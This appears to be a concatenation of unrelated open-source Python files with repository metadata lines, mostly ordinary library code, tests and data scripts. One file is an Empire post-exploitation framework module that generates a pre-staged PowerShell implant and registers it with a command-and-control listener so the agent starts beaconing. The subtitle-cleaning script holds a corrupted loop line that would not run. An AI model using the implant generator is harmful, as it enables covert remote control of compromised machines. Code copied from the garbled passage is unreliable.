assert_equal(sys.getrefcount(a[key]),2)
assert_equal(a[key],123.0)
@dec.slow
def test_set_double_new(self):
a = UserDict()
key = 1.0
inline_tools.inline('a[key] = 123.0;',['a','key'])
assert_equal(sys.getrefcount(key),4) # should be 3
assert_equal(sys.getrefcount(a[key]),2)
assert_equal(a[key],123.0)
@dec.slow
def test_set_complex(self):
a = UserDict()
key = 1+1j
inline_tools.inline("a[key] = 1234;",['a','key'])
assert_equal(sys.getrefcount(key),4) # should be 3
assert_equal(sys.getrefcount(a[key]),2)
assert_equal(a[key],1234)
@dec.slow
def test_set_char(self):
a = UserDict()
inline_tools.inline('a["hello"] = 123.0;',['a'])
assert_equal(sys.getrefcount(a["hello"]),2)
assert_equal(a["hello"],123.0)
@dec.slow
def test_set_class(self):
a = UserDict()
class Foo:
def __init__(self,val):
self.val = val
def __hash__(self):
return self.val
key = Foo(4)
inline_tools.inline('a[key] = "bubba";',['a','key'])
first = sys.getrefcount(key)
inline_tools.inline('a[key] = "bubba";',['a','key'])
second = sys.getrefcount(key)
# I don't think we're leaking if this is true
assert_equal(first,second)
# !! BUT -- I think this should be 3
assert_equal(sys.getrefcount(key),4)
assert_equal(sys.getrefcount(a[key]),2)
assert_equal(a[key],'bubba')
@dec.slow
def test_set_from_member(self):
a = UserDict()
a['first'] = 1
a['second'] = 2
inline_tools.inline('a["first"] = a["second"];',['a'])
assert_equal(a['first'],a['second'])
if __name__ == "__main__":
run_module_suite()
| bsd-3-clause |
MatzeB/libfirm | scripts/jinja2/__init__.py | 10 | 2330 | # -*- coding: utf-8 -*-
"""
jinja2
~~~~~~
Jinja2 is a template engine written in pure Python. It provides a
Django inspired non-XML syntax but supports inline expressions and
an optional sandboxed environment.
Nutshell
--------
Here a small example of a Jinja2 template::
{% extends 'base.html' %}
{% block title %}Memberlist{% endblock %}
{% block content %}
<ul>
{% for user in users %}
<li><a href="{{ user.url }}">{{ user.username }}</a></li>
{% endfor %}
</ul>
{% endblock %}
:copyright: (c) 2010 by the Jinja Team.
:license: BSD, see LICENSE for more details.
"""
__docformat__ = 'restructuredtext en'
__version__ = '2.8-dev'
# high level interface
from jinja2.environment import Environment, Template
# loaders
from jinja2.loaders import BaseLoader, FileSystemLoader, PackageLoader, \
DictLoader, FunctionLoader, PrefixLoader, ChoiceLoader, \
ModuleLoader
# bytecode caches
from jinja2.bccache import BytecodeCache, FileSystemBytecodeCache, \
MemcachedBytecodeCache
# undefined types
from jinja2.runtime import Undefined, DebugUndefined, StrictUndefined, \
make_logging_undefined
# exceptions
from jinja2.exceptions import TemplateError, UndefinedError, \
TemplateNotFound, TemplatesNotFound, TemplateSyntaxError, \
TemplateAssertionError
# decorators and public utilities
from jinja2.filters import environmentfilter, contextfilter, \
evalcontextfilter
from jinja2.utils import Markup, escape, clear_caches, \
environmentfunction, evalcontextfunction, contextfunction, \
is_undefined
__all__ = [
'Environment', 'Template', 'BaseLoader', 'FileSystemLoader',
'PackageLoader', 'DictLoader', 'FunctionLoader', 'PrefixLoader',
'ChoiceLoader', 'BytecodeCache', 'FileSystemBytecodeCache',
'MemcachedBytecodeCache', 'Undefined', 'DebugUndefined',
'StrictUndefined', 'TemplateError', 'UndefinedError', 'TemplateNotFound',
'TemplatesNotFound', 'TemplateSyntaxError', 'TemplateAssertionError',
'ModuleLoader', 'environmentfilter', 'contextfilter', 'Markup', 'escape',
'environmentfunction', 'contextfunction', 'clear_caches', 'is_undefined',
'evalcontextfilter', 'evalcontextfunction', 'make_logging_undefined',
]
| lgpl-2.1 |
amoikevin/gyp | test/mac/gyptest-archs.py | 88 | 3580 | #!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Tests things related to ARCHS.
"""
import TestGyp
import TestMac
import re
import subprocess
import sys
if sys.platform == 'darwin':
test = TestGyp.TestGyp(formats=['ninja', 'make', 'xcode'])
test.run_gyp('test-no-archs.gyp', chdir='archs')
test.build('test-no-archs.gyp', test.ALL, chdir='archs')
result_file = test.built_file_path('Test', chdir='archs')
test.must_exist(result_file)
if TestMac.Xcode.Version() >= '0500':
expected_type = ['x86_64']
else:
expected_type = ['i386']
TestMac.CheckFileType(test, result_file, expected_type)
test.run_gyp('test-valid-archs.gyp', chdir='archs')
test.build('test-valid-archs.gyp', test.ALL, chdir='archs')
result_file = test.built_file_path('Test', chdir='archs')
test.must_exist(result_file)
TestMac.CheckFileType(test, result_file, ['x86_64'])
test.run_gyp('test-archs-x86_64.gyp', chdir='archs')
test.build('test-archs-x86_64.gyp', test.ALL, chdir='archs')
result_file = test.built_file_path('Test64', chdir='archs')
test.must_exist(result_file)
TestMac.CheckFileType(test, result_file, ['x86_64'])
test.run_gyp('test-dependencies.gyp', chdir='archs')
test.build('test-dependencies.gyp', target=test.ALL, chdir='archs')
products = ['c_standalone', 'd_standalone']
for product in products:
result_file = test.built_file_path(
product, chdir='archs', type=test.STATIC_LIB)
test.must_exist(result_file)
if test.format != 'make':
# Build all targets except 'exe_32_64_no_sources' that does build
# but should not cause error when generating ninja files
targets = [
'static_32_64', 'shared_32_64', 'shared_32_64_bundle',
'module_32_64', 'module_32_64_bundle',
'exe_32_64', 'exe_32_64_bundle', 'precompiled_prefix_header_mm_32_64',
]
test.run_gyp('test-archs-multiarch.gyp', chdir='archs')
for target in targets:
test.build('test-archs-multiarch.gyp', target=target, chdir='archs')
result_file = test.built_file_path(
'static_32_64', chdir='archs', type=test.STATIC_LIB)
test.must_exist(result_file)
TestMac.CheckFileType(test, result_file, ['i386', 'x86_64'])
result_file = test.built_file_path(
'shared_32_64', chdir='archs', type=test.SHARED_LIB)
test.must_exist(result_file)
TestMac.CheckFileType(test, result_file, ['i386', 'x86_64'])
result_file = test.built_file_path('My Framework.framework/My Framework',
chdir='archs')
test.must_exist(result_file)
TestMac.CheckFileType(test, result_file, ['i386', 'x86_64'])
# Check that symbol "_x" made it into both versions of the binary:
if not all(['D _x' in subprocess.check_output(
['nm', '-arch', arch, result_file]) for arch in ['i386', 'x86_64']]):
# This can only flakily fail, due to process ordering issues. If this
# does fail flakily, then something's broken, it's not the test at fault.
test.fail_test()
result_file = test.built_file_path(
'exe_32_64', chdir='archs', type=test.EXECUTABLE)
test.must_exist(result_file)
TestMac.CheckFileType(test, result_file, ['i386', 'x86_64'])
result_file = test.built_file_path('Test App.app/Contents/MacOS/Test App',
chdir='archs')
test.must_exist(result_file)
TestMac.CheckFileType(test, result_file, ['i386', 'x86_64'])
| bsd-3-clause |
Hackplayers/Empire-mod-Hackplayers | lib/modules/external/generate_agent.py | 14 | 4774 | import os
import string
from pydispatch import dispatcher
from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Generate Agent',
'Author': ['@harmj0y'],
'Description': ("Generates an agent code instance for a specified listener, "
"pre-staged, and register the agent in the database. This allows "
"the agent to begin beconing behavior immediately."),
'Comments': []
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Listener' : {
'Description' : 'Listener to generate the agent for.',
'Required' : True,
'Value' : ''
},
'Language' : {
'Description' : 'Language to generate for the agent.',
'Required' : True,
'Value' : ''
},
'OutFile' : {
'Description' : 'Output file to write the agent code to.',
'Required' : True,
'Value' : '/tmp/agent'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def execute(self):
listenerName = self.options['Listener']['Value']
language = self.options['Language']['Value']
outFile = self.options['OutFile']['Value']
if listenerName not in self.mainMenu.listeners.activeListeners:
print helpers.color("[!] Error: %s not an active listener")
return None
activeListener = self.mainMenu.listeners.activeListeners[listenerName]
chars = string.uppercase + string.digits
sessionID = helpers.random_string(length=8, charset=chars)
stagingKey = activeListener['options']['StagingKey']['Value']
delay = activeListener['options']['DefaultDelay']['Value']
jitter = activeListener['options']['DefaultJitter']['Value']
profile = activeListener['options']['DefaultProfile']['Value']
killDate = activeListener['options']['KillDate']['Value']
workingHours = activeListener['options']['WorkingHours']['Value']
lostLimit = activeListener['options']['DefaultLostLimit']['Value']
if 'Host' in activeListener['options']:
host = activeListener['options']['Host']['Value']
else:
host = ''
# add the agent
self.mainMenu.agents.add_agent(sessionID, '0.0.0.0', delay, jitter, profile, killDate, workingHours, lostLimit, listener=listenerName, language=language)
# get the agent's session key
sessionKey = self.mainMenu.agents.get_agent_session_key_db(sessionID)
agentCode = self.mainMenu.listeners.loadedListeners[activeListener['moduleName']].generate_agent(activeListener['options'], language=language)
if language.lower() == 'powershell':
agentCode += "\nInvoke-Empire -Servers @('%s') -StagingKey '%s' -SessionKey '%s' -SessionID '%s';" % (host, stagingKey, sessionKey, sessionID)
else:
print helpers.color('[!] Only PowerShell agent generation is supported at this time.')
return ''
# TODO: python agent generation - need to patch in crypto functions from the stager...
print helpers.color("[+] Pre-generated agent '%s' now registered." % (sessionID))
# increment the supplied file name appropriately if it already exists
i = 1
outFileOrig = outFile
while os.path.exists(outFile):
parts = outFileOrig.split('.')
if len(parts) == 1:
base = outFileOrig
ext = None
else:
base = '.'.join(parts[0:-1])
ext = parts[-1]
if ext:
outFile = "%s%s.%s" % (base, i, ext)
else:
outFile = "%s%s" % (base, i)
i += 1
f = open(outFile, 'w')
f.write(agentCode)
f.close()
print helpers.color("[*] %s agent code for listener %s with sessionID '%s' written out to %s" % (language, listenerName, sessionID, outFile))
print helpers.color("[*] Run sysinfo command after agent starts checking in!")
| bsd-3-clause |
fredhohman/a-viz-of-ice-and-fire | scripts/slice_clean_dialogue_general.py | 1 | 2079 | # author: istewart6 (some help from ssoni)
"""
Code to break subtitle dialogue
into 60 equal-length clean slices per episode.
"""
from __future__ import division
import pandas as pd
from datetime import datetime
import re, os
import argparse
from clean_extracted_text import clean_text
def convert_time(time_):
new_time = datetime.strptime(time_, '%H:%M:%S,%f')
new_time = new_time.hour * 60 + new_time.minute + new_time.second / 60
return new_time
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--sub_file', default='../data/subtitles/subtitlesInTSV/finding_nemo.tsv')
args = parser.parse_args()
sub_file = args.sub_file
sub_name = os.path.basename(sub_file).replace('.tsv', '_clean')
out_dir = os.path.dirname(sub_file)
# slice_length = 2
n_slices = 60
sub_data = pd.read_csv(sub_file, sep='\t', index_col=0)
# sub_data = pd.read_csv(sub_file, sep='\t')
end = sub_data['endTime'].max()
end = convert_time(end)
print('got end %s'%(end))
slice_length = end / n_slices
# print('about to convert end time data %s'%(e_data['endTime']))
slices = sub_data.apply(lambda r : int(convert_time(r['startTime']) / slice_length),
axis=1)
sub_data['slice'] = slices
# clean shit
sub_data['dialogue'] = sub_data['dialogue'].apply(clean_text)
# TODO: also get rid of duplicate lines
clean_rows = []
row_count = sub_data.shape[0]
for i, r in 0sub_data.iterrows():
if(i > 0 and i < row_count-1):
current_dialogue = r['dialogue'].lower().strip()
last_dialogue = sub_data.ix[i-1, 'dialogue'].lower().strip()
if(current_dialogue != last_dialogue):
r = pd.DataFrame(r).transpose()
clean_rows.append(r)
print('got %d/%d clean rows'%(len(clean_rows), sub_data.shape[0]))
sub_data = pd.concat(clean_rows, axis=0)
out_name = os.path.join(out_dir, '%s.tsv'%(sub_name))
sub_data.to_csv(out_name, sep='\t', index=False)
if __name__ == '__main__':
main()
| mit |
LonglyCode/flask | flask/debughelpers.py | 318 | 6024 | # -*- coding: utf-8 -*-
"""
flask.debughelpers
~~~~~~~~~~~~~~~~~~
Various helpers to make the development experience better.
:copyright: (c) 2015 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
from ._compat import implements_to_string, text_type
from .app import Flask
from .blueprints import Blueprint
from .globals import _request_ctx_stack
class UnexpectedUnicodeError(AssertionError, UnicodeError):
"""Raised in places where we want some better error reporting for
unexpected unicode or binary data.
"""
@implements_to_string
class DebugFilesKeyError(KeyError, AssertionError):
"""Raised from request.files during debugging. The idea is that it can
provide a better error message than just a generic KeyError/BadRequest.
"""
def __init__(self, request, key):
form_matches = request.form.getlist(key)
buf = ['You tried to access the file "%s" in the request.files '
'dictionary but it does not exist. The mimetype for the request '
'is "%s" instead of "multipart/form-data" which means that no '
'file contents were transmitted. To fix this error you should '
'provide enctype="multipart/form-data" in your form.' %
(key, request.mimetype)]
if form_matches:
buf.append('\n\nThe browser instead transmitted some file names. '
'This was submitted: %s' % ', '.join('"%s"' % x
for x in form_matches))
self.msg = ''.join(buf)
def __str__(self):
return self.msg
class FormDataRoutingRedirect(AssertionError):
"""This exception is raised by Flask in debug mode if it detects a
redirect caused by the routing system when the request method is not
GET, HEAD or OPTIONS. Reasoning: form data will be dropped.
"""
def __init__(self, request):
exc = request.routing_exception
buf = ['A request was sent to this URL (%s) but a redirect was '
'issued automatically by the routing system to "%s".'
% (request.url, exc.new_url)]
# In case just a slash was appended we can be extra helpful
if request.base_url + '/' == exc.new_url.split('?')[0]:
buf.append(' The URL was defined with a trailing slash so '
'Flask will automatically redirect to the URL '
'with the trailing slash if it was accessed '
'without one.')
buf.append(' Make sure to directly send your %s-request to this URL '
'since we can\'t make browsers or HTTP clients redirect '
'with form data reliably or without user interaction.' %
request.method)
buf.append('\n\nNote: this exception is only raised in debug mode')
AssertionError.__init__(self, ''.join(buf).encode('utf-8'))
def attach_enctype_error_multidict(request):
"""Since Flask 0.8 we're monkeypatching the files object in case a
request is detected that does not use multipart form data but the files
object is accessed.
"""
oldcls = request.files.__class__
class newcls(oldcls):
def __getitem__(self, key):
try:
return oldcls.__getitem__(self, key)
except KeyError:
if key not in request.form:
raise
raise DebugFilesKeyError(request, key)
newcls.__name__ = oldcls.__name__
newcls.__module__ = oldcls.__module__
request.files.__class__ = newcls
def _dump_loader_info(loader):
yield 'class: %s.%s' % (type(loader).__module__, type(loader).__name__)
for key, value in sorted(loader.__dict__.items()):
if key.startswith('_'):
continue
if isinstance(value, (tuple, list)):
if not all(isinstance(x, (str, text_type)) for x in value):
continue
yield '%s:' % key
for item in value:
yield ' - %s' % item
continue
elif not isinstance(value, (str, text_type, int, float, bool)):
continue
yield '%s: %r' % (key, value)
def explain_template_loading_attempts(app, template, attempts):
"""This should help developers understand what failed"""
info = ['Locating template "%s":' % template]
total_found = 0
blueprint = None
reqctx = _request_ctx_stack.top
if reqctx is not None and reqctx.request.blueprint is not None:
blueprint = reqctx.request.blueprint
for idx, (loader, srcobj, triple) in enumerate(attempts):
if isinstance(srcobj, Flask):
src_info = 'application "%s"' % srcobj.import_name
elif isinstance(srcobj, Blueprint):
src_info = 'blueprint "%s" (%s)' % (srcobj.name,
srcobj.import_name)
else:
src_info = repr(srcobj)
info.append('% 5d: trying loader of %s' % (
idx + 1, src_info))
for line in _dump_loader_info(loader):
info.append(' %s' % line)
if triple is None:
detail = 'no match'
else:
detail = 'found (%r)' % (triple[1] or '<string>')
total_found += 1
info.append(' -> %s' % detail)
seems_fishy = False
if total_found == 0:
info.append('Error: the template could not be found.')
seems_fishy = True
elif total_found > 1:
info.append('Warning: multiple loaders returned a match for the template.')
seems_fishy = True
if blueprint is not None and seems_fishy:
info.append(' The template was looked up from an endpoint that '
'belongs to the blueprint "%s".' % blueprint)
info.append(' Maybe you did not place a template in the right folder?')
info.append(' See http://flask.pocoo.org/docs/blueprints/#templates')
app.logger.info('\n'.join(info))
| bsd-3-clause |
louietsai/python-for-android | python3-alpha/python3-src/Lib/encodings/mac_latin2.py | 647 | 8565 | """ Python Character Mapping Codec generated from 'LATIN2.TXT' with gencodec.py.
Written by Marc-Andre Lemburg (mal@lemburg.com).
(c) Copyright CNRI, All Rights Reserved. NO WARRANTY.
(c) Copyright 2000 Guido van Rossum.
"""#"
import codecs
### Codec APIs
class Codec(codecs.Codec):
def encode(self,input,errors='strict'):
return codecs.charmap_encode(input,errors,encoding_map)
def decode(self,input,errors='strict'):
return codecs.charmap_decode(input,errors,decoding_map)
class IncrementalEncoder(codecs.IncrementalEncoder):
def encode(self, input, final=False):
return codecs.charmap_encode(input,self.errors,encoding_map)[0]
class IncrementalDecoder(codecs.IncrementalDecoder):
def decode(self, input, final=False):
return codecs.charmap_decode(input,self.errors,decoding_map)[0]
class StreamWriter(Codec,codecs.StreamWriter):
pass
class StreamReader(Codec,codecs.StreamReader):
pass
### encodings module API
def getregentry():
return codecs.CodecInfo(
name='mac-latin2',
encode=Codec().encode,
decode=Codec().decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
### Decoding Map
decoding_map = codecs.make_identity_dict(range(256))
decoding_map.update({
0x0080: 0x00c4, # LATIN CAPITAL LETTER A WITH DIAERESIS
0x0081: 0x0100, # LATIN CAPITAL LETTER A WITH MACRON
0x0082: 0x0101, # LATIN SMALL LETTER A WITH MACRON
0x0083: 0x00c9, # LATIN CAPITAL LETTER E WITH ACUTE
0x0084: 0x0104, # LATIN CAPITAL LETTER A WITH OGONEK
0x0085: 0x00d6, # LATIN CAPITAL LETTER O WITH DIAERESIS
0x0086: 0x00dc, # LATIN CAPITAL LETTER U WITH DIAERESIS
0x0087: 0x00e1, # LATIN SMALL LETTER A WITH ACUTE
0x0088: 0x0105, # LATIN SMALL LETTER A WITH OGONEK
0x0089: 0x010c, # LATIN CAPITAL LETTER C WITH CARON
0x008a: 0x00e4, # LATIN SMALL LETTER A WITH DIAERESIS
0x008b: 0x010d, # LATIN SMALL LETTER C WITH CARON
0x008c: 0x0106, # LATIN CAPITAL LETTER C WITH ACUTE
0x008d: 0x0107, # LATIN SMALL LETTER C WITH ACUTE
0x008e: 0x00e9, # LATIN SMALL LETTER E WITH ACUTE
0x008f: 0x0179, # LATIN CAPITAL LETTER Z WITH ACUTE
0x0090: 0x017a, # LATIN SMALL LETTER Z WITH ACUTE
0x0091: 0x010e, # LATIN CAPITAL LETTER D WITH CARON
0x0092: 0x00ed, # LATIN SMALL LETTER I WITH ACUTE
0x0093: 0x010f, # LATIN SMALL LETTER D WITH CARON
0x0094: 0x0112, # LATIN CAPITAL LETTER E WITH MACRON
0x0095: 0x0113, # LATIN SMALL LETTER E WITH MACRON
0x0096: 0x0116, # LATIN CAPITAL LETTER E WITH DOT ABOVE
0x0097: 0x00f3, # LATIN SMALL LETTER O WITH ACUTE
0x0098: 0x0117, # LATIN SMALL LETTER E WITH DOT ABOVE
0x0099: 0x00f4, # LATIN SMALL LETTER O WITH CIRCUMFLEX
0x009a: 0x00f6, # LATIN SMALL LETTER O WITH DIAERESIS
0x009b: 0x00f5, # LATIN SMALL LETTER O WITH TILDE
0x009c: 0x00fa, # LATIN SMALL LETTER U WITH ACUTE
0x009d: 0x011a, # LATIN CAPITAL LETTER E WITH CARON
0x009e: 0x011b, # LATIN SMALL LETTER E WITH CARON
0x009f: 0x00fc, # LATIN SMALL LETTER U WITH DIAERESIS
0x00a0: 0x2020, # DAGGER
0x00a1: 0x00b0, # DEGREE SIGN
0x00a2: 0x0118, # LATIN CAPITAL LETTER E WITH OGONEK
0x00a4: 0x00a7, # SECTION SIGN
0x00a5: 0x2022, # BULLET
0x00a6: 0x00b6, # PILCROW SIGN
0x00a7: 0x00df, # LATIN SMALL LETTER SHARP S
0x00a8: 0x00ae, # REGISTERED SIGN
0x00aa: 0x2122, # TRADE MARK SIGN
0x00ab: 0x0119, # LATIN SMALL LETTER E WITH OGONEK
0x00ac: 0x00a8, # DIAERESIS
0x00ad: 0x2260, # NOT EQUAL TO
0x00ae: 0x0123, # LATIN SMALL LETTER G WITH CEDILLA
0x00af: 0x012e, # LATIN CAPITAL LETTER I WITH OGONEK
0x00b0: 0x012f, # LATIN SMALL LETTER I WITH OGONEK
0x00b1: 0x012a, # LATIN CAPITAL LETTER I WITH MACRON
0x00b2: 0x2264, # LESS-THAN OR EQUAL TO
0x00b3: 0x2265, # GREATER-THAN OR EQUAL TO
0x00b4: 0x012b, # LATIN SMALL LETTER I WITH MACRON
0x00b5: 0x0136, # LATIN CAPITAL LETTER K WITH CEDILLA
0x00b6: 0x2202, # PARTIAL DIFFERENTIAL
0x00b7: 0x2211, # N-ARY SUMMATION
0x00b8: 0x0142, # LATIN SMALL LETTER L WITH STROKE
0x00b9: 0x013b, # LATIN CAPITAL LETTER L WITH CEDILLA
0x00ba: 0x013c, # LATIN SMALL LETTER L WITH CEDILLA
0x00bb: 0x013d, # LATIN CAPITAL LETTER L WITH CARON
0x00bc: 0x013e, # LATIN SMALL LETTER L WITH CARON
0x00bd: 0x0139, # LATIN CAPITAL LETTER L WITH ACUTE
0x00be: 0x013a, # LATIN SMALL LETTER L WITH ACUTE
0x00bf: 0x0145, # LATIN CAPITAL LETTER N WITH CEDILLA
0x00c0: 0x0146, # LATIN SMALL LETTER N WITH CEDILLA
0x00c1: 0x0143, # LATIN CAPITAL LETTER N WITH ACUTE
0x00c2: 0x00ac, # NOT SIGN
0x00c3: 0x221a, # SQUARE ROOT
0x00c4: 0x0144, # LATIN SMALL LETTER N WITH ACUTE
0x00c5: 0x0147, # LATIN CAPITAL LETTER N WITH CARON
0x00c6: 0x2206, # INCREMENT
0x00c7: 0x00ab, # LEFT-POINTING DOUBLE ANGLE QUOTATION MARK
0x00c8: 0x00bb, # RIGHT-POINTING DOUBLE ANGLE QUOTATION MARK
0x00c9: 0x2026, # HORIZONTAL ELLIPSIS
0x00ca: 0x00a0, # NO-BREAK SPACE
0x00cb: 0x0148, # LATIN SMALL LETTER N WITH CARON
0x00cc: 0x0150, # LATIN CAPITAL LETTER O WITH DOUBLE ACUTE
0x00cd: 0x00d5, # LATIN CAPITAL LETTER O WITH TILDE
0x00ce: 0x0151, # LATIN SMALL LETTER O WITH DOUBLE ACUTE
0x00cf: 0x014c, # LATIN CAPITAL LETTER O WITH MACRON
0x00d0: 0x2013, # EN DASH
0x00d1: 0x2014, # EM DASH
0x00d2: 0x201c, # LEFT DOUBLE QUOTATION MARK
0x00d3: 0x201d, # RIGHT DOUBLE QUOTATION MARK
0x00d4: 0x2018, # LEFT SINGLE QUOTATION MARK
0x00d5: 0x2019, # RIGHT SINGLE QUOTATION MARK
0x00d6: 0x00f7, # DIVISION SIGN
0x00d7: 0x25ca, # LOZENGE
0x00d8: 0x014d, # LATIN SMALL LETTER O WITH MACRON
0x00d9: 0x0154, # LATIN CAPITAL LETTER R WITH ACUTE
0x00da: 0x0155, # LATIN SMALL LETTER R WITH ACUTE
0x00db: 0x0158, # LATIN CAPITAL LETTER R WITH CARON
0x00dc: 0x2039, # SINGLE LEFT-POINTING ANGLE QUOTATION MARK
0x00dd: 0x203a, # SINGLE RIGHT-POINTING ANGLE QUOTATION MARK
0x00de: 0x0159, # LATIN SMALL LETTER R WITH CARON
0x00df: 0x0156, # LATIN CAPITAL LETTER R WITH CEDILLA
0x00e0: 0x0157, # LATIN SMALL LETTER R WITH CEDILLA
0x00e1: 0x0160, # LATIN CAPITAL LETTER S WITH CARON
0x00e2: 0x201a, # SINGLE LOW-9 QUOTATION MARK
0x00e3: 0x201e, # DOUBLE LOW-9 QUOTATION MARK
0x00e4: 0x0161, # LATIN SMALL LETTER S WITH CARON
0x00e5: 0x015a, # LATIN CAPITAL LETTER S WITH ACUTE
0x00e6: 0x015b, # LATIN SMALL LETTER S WITH ACUTE
0x00e7: 0x00c1, # LATIN CAPITAL LETTER A WITH ACUTE
0x00e8: 0x0164, # LATIN CAPITAL LETTER T WITH CARON
0x00e9: 0x0165, # LATIN SMALL LETTER T WITH CARON
0x00ea: 0x00cd, # LATIN CAPITAL LETTER I WITH ACUTE
0x00eb: 0x017d, # LATIN CAPITAL LETTER Z WITH CARON
0x00ec: 0x017e, # LATIN SMALL LETTER Z WITH CARON
0x00ed: 0x016a, # LATIN CAPITAL LETTER U WITH MACRON
0x00ee: 0x00d3, # LATIN CAPITAL LETTER O WITH ACUTE
0x00ef: 0x00d4, # LATIN CAPITAL LETTER O WITH CIRCUMFLEX
0x00f0: 0x016b, # LATIN SMALL LETTER U WITH MACRON
0x00f1: 0x016e, # LATIN CAPITAL LETTER U WITH RING ABOVE
0x00f2: 0x00da, # LATIN CAPITAL LETTER U WITH ACUTE
0x00f3: 0x016f, # LATIN SMALL LETTER U WITH RING ABOVE
0x00f4: 0x0170, # LATIN CAPITAL LETTER U WITH DOUBLE ACUTE
0x00f5: 0x0171, # LATIN SMALL LETTER U WITH DOUBLE ACUTE
0x00f6: 0x0172, # LATIN CAPITAL LETTER U WITH OGONEK
0x00f7: 0x0173, # LATIN SMALL LETTER U WITH OGONEK
0x00f8: 0x00dd, # LATIN CAPITAL LETTER Y WITH ACUTE
0x00f9: 0x00fd, # LATIN SMALL LETTER Y WITH ACUTE
0x00fa: 0x0137, # LATIN SMALL LETTER K WITH CEDILLA
0x00fb: 0x017b, # LATIN CAPITAL LETTER Z WITH DOT ABOVE
0x00fc: 0x0141, # LATIN CAPITAL LETTER L WITH STROKE
0x00fd: 0x017c, # LATIN SMALL LETTER Z WITH DOT ABOVE
0x00fe: 0x0122, # LATIN CAPITAL LETTER G WITH CEDILLA
0x00ff: 0x02c7, # CARON
})
### Encoding Map
encoding_map = codecs.make_encoding_map(decoding_map)
| apache-2.0 |
mkness/TheCannon | code/makeplots_talks/makeplot_fits_self_cluster_ages.py | 1 | 6112 | #!/usr/bin/python
import scipy
import numpy
import pickle
from numpy import *
from scipy import ndimage
from scipy import interpolate
from numpy import loadtxt
import os
import numpy as np
from numpy import *
import matplotlib
from pylab import rcParams
from pylab import *
from matplotlib import pyplot
import matplotlib.pyplot as plt
from matplotlib import colors
from matplotlib.pyplot import axes
from matplotlib.pyplot import colorbar
#from matplotlib.ticker import NullFormatter
from matplotlib.ticker import MultipleLocator, FormatStrFormatter
s = matplotlib.font_manager.FontProperties()
s.set_family('serif')
s.set_size(14)
from matplotlib import rc
rc('text', usetex=False)
rc('font', family='serif')
def plotfits():
# file_in = "self_tags.pickle"
file_in = "self_2nd_order_tags.pickle"
file_in2 = open(file_in, 'r')
params, icovs_params = pickle.load(file_in2)
params = array(params)
file_in2.close()
filein2 = 'starsin_test2.txt' # this is for self test this is dangerous - need to implement the same logg cut here, this is original data values or otherwise metadata
filein2 = 'starsin_new_all_ordered.txt' # this is for self test this is dangerous - need to implement the same logg cut here, this is original data values or otherwise metadata
filein2 = 'test4_selfg.txt' # this is for self test this is dangerous - need to implement the same logg cut here, this is original data values or otherwise metadata
filein3 = 'ages.txt'
a = open(filein2)
al = a.readlines()
names = []
for each in al:
names.append(each.split()[1])
unames = unique(names)
starind = arange(0,len(names), 1)
name_ind = []
names = array(names)
for each in unames:
takeit = each == names
name_ind.append(np.int(starind[takeit][-1]+1. ) )
cluster_ind = [0] + list(sort(name_ind))# + [len(al)]
plot_markers = ['ko', 'yo', 'ro', 'bo', 'co','k*', 'y*', 'r*', 'b*', 'c*', 'ks', 'rs', 'bs', 'cs', 'rd', 'kd', 'bd', 'cd', 'mo', 'ms' ]
t,g,feh,t_err,feh_err = loadtxt(filein2, usecols = (4,6,8,16,17), unpack =1)
tA,gA,fehA = loadtxt(filein2, usecols = (3,5,7), unpack =1)
age = loadtxt(filein3, usecols = (0,), unpack =1)
#
g_err = [0]*len(g)
g_err = array(g_err)
diffT = abs(array(t) - array(tA) )
pick = diffT < 4000.
t,g,feh,t_err,g_err,feh_err = t[pick], g[pick], feh[pick], t_err[pick], g_err[pick], feh_err[pick]
age = age[pick]
#
g_err = [0]*len(g)
age_err = [0]*len(g)
g_err = array(g_err)
age_err = array(age_err)
params = array(params)
covs_params = np.linalg.inv(icovs_params)
rcParams['figure.figsize'] = 12.0, 10.0
fig, temp = pyplot.subplots(4,1, sharex=False, sharey=False)
fig = plt.figure()
ax = fig.add_subplot(111, frameon = 0 )
ax.set_ylabel("The Cannon", labelpad = 40, fontsize = 20 )
ax.tick_params(labelcolor= 'w', top = 'off', bottom = 'off', left = 'off', right = 'off' )
ax1 = fig.add_subplot(411)
ax2 = fig.add_subplot(412)
ax3 = fig.add_subplot(413)
ax4 = fig.add_subplot(414)
#ax1 = temp[0]
#ax2 = temp[1]
#ax3 = temp[2]
#ax4 = temp[3]
params_labels = [params[:,0], params[:,1], params[:,2] , params[:,3], covs_params[:,0,0]**0.5, covs_params[:,1,1]**0.5, covs_params[:,2,2]**0.5 , covs_params[:,3,3]**0.5]
cval = ['k', 'b', 'r', 'c']
input_ASPCAP = [t, g, feh, age, t_err, g_err, feh_err, age_err]
listit_1 = [0,1,2,3]
listit_2 = [1,0,0,0]
axs = [ax1,ax2,ax3,ax4]
labels = ['teff', 'logg', 'Fe/H', 'age' ]
for i in range(0,len(cluster_ind)-1):
indc1 = cluster_ind[i]
indc2 = cluster_ind[i+1]
for ax, num,num2,label1,x1,y1 in zip(axs, listit_1,listit_2,labels, [4800,3.0,0.3,0.3], [3400,1,-1.5,5]):
pick = logical_and(g[indc1:indc2] > 0, logical_and(t_err[indc1:indc2] < 300, feh[indc1:indc2] > -4.0) )
cind = array(input_ASPCAP[1][indc1:indc2][pick])
cind = array(input_ASPCAP[num2][indc1:indc2][pick]).flatten()
ax.plot(input_ASPCAP[num][indc1:indc2][pick], params_labels[num][indc1:indc2][pick], plot_markers[i])
#ax.errorbar(input_ASPCAP[num][indc1:indc2][pick], params_labels[num][indc1:indc2][pick],yerr= params_labels[num+3][indc1:indc2][pick],marker='',ls='',zorder=0, fmt = None,elinewidth = 1,capsize = 0)
#ax.errorbar(input_ASPCAP[num][indc1:indc2][pick], params_labels[num][indc1:indc2][pick],xerr=input_ASPCAP[num+3][indc1:indc2][pick],marker='',ls='',zorder=0, fmt = None,elinewidth = 1,capsize = 0)
